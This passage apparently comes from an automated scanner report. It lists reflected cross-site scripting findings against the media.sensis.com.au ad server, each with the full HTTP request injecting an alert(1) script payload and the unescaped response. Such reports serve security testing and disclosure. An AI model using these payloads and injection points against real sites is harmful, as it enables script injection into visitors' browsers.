Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:43 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000f6904"><script>alert(1)</script>e367996f762/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.45. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d607d"><script>alert(1)</script>5d682b42722 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_randomd607d"><script>alert(1)</script>5d682b42722=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:45 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_randomd607d"><script>alert(1)</script>5d682b42722=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.46. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a982e"><script>alert(1)</script>7c444ae9300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?a982e"><script>alert(1)</script>7c444ae9300=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:37 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 322
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?a982e"><script>alert(1)</script>7c444ae9300=1" target="_new">
...[SNIP]...

1.47. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99cbb"><script>alert(1)</script>747a230ed95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver99cbb"><script>alert(1)</script>747a230ed95/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:11 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d380000000099cbb"><script>alert(1)</script>747a230ed95/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.48. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93677"><script>alert(1)</script>44e502d5c1b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random93677"><script>alert(1)</script>44e502d5c1b=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 319
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random93677"><script>alert(1)</script>44e502d5c1b=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.49. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1dfb"><script>alert(1)</script>d811a4a1280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?b1dfb"><script>alert(1)</script>d811a4a1280=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:06 GMT
X-DirectServer: DS6
Content-Type: text/html
Content-Length: 322
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003674538cd0d3800000000/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?b1dfb"><script>alert(1)</script>d811a4a1280=1" target="_new">
...[SNIP]...

1.50. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0d4e"><script>alert(1)</script>62fcb4681d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserverc0d4e"><script>alert(1)</script>62fcb4681d6/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:12 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 359
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f64538cd0d3800000000c0d4e"><script>alert(1)</script>62fcb4681d6/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.51. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfc0"><script>alert(1)</script>2bd1dcbe073 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random7bfc0"><script>alert(1)</script>2bd1dcbe073=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS4
Content-Type: text/html
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f31e38cd0d3800000000/acc_random7bfc0"><script>alert(1)</script>2bd1dcbe073=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.52. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cec"><script>alert(1)</script>e5f60b4722f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?68cec"><script>alert(1)</script>e5f60b4722f=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:06 GMT
X-DirectServer: DS1
Content-Type: text/html
Content-Length: 367
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40438cd0d3800000000/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?68cec"><script>alert(1)</script>e5f60b4722f=1" target="_new">
...[SNIP]...

1.53. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 342f2"-alert(1)-"eb87461d58a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hserver342f2"-alert(1)-"eb87461d58a/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:50 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2054
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000342f2"-alert(1)-"eb87461d58a/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "h
...[SNIP]...

1.54. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b34ee"-alert(1)-"491d3a72638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hserver/acc_randomb34ee"-alert(1)-"491d3a72638=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:54 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 2042
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_randomb34ee"-alert(1)-"491d3a72638=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1/relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media
...[SNIP]...

1.55. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bd63"-alert(1)-"cd13d271e02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?3bd63"-alert(1)-"cd13d271e02=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:44 GMT
X-DirectServer: DS2
Content-Type: text/html
Content-Length: 2060
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
var skin_settings ={
   gutterWidth: 136,
   gutterHeight: 970,
   leftImage: '<img src="http://medrx.sensis.com.au/content/MeatAndLivestockAustralia/1
...[SNIP]...
lia/118071/BEE0554_NRLSkin_R.jpg">',
   leftClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1?3bd63"-alert(1)-"cd13d271e02=1&relocate=http://www.themainmeal.com.au/RecipesInspiration/Barbecue-recipes/Barbecue-recipes.htm",
   rightClick: "http://media.sensis.com.au/ADCLICK/CID=0003f79738cd0d3800000000/acc_random=84996739971
...[SNIP]...

1.56. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://media.sensis.com.au
Path:	/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 712bb"-alert(1)-"696f09d19b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /hserver712bb"-alert(1)-"696f09d19b0/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:14 GMT
X-DirectServer: DS5
Content-Type: text/html
Content-Length: 2051
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<script language="JavaScript" type="text/javascript">
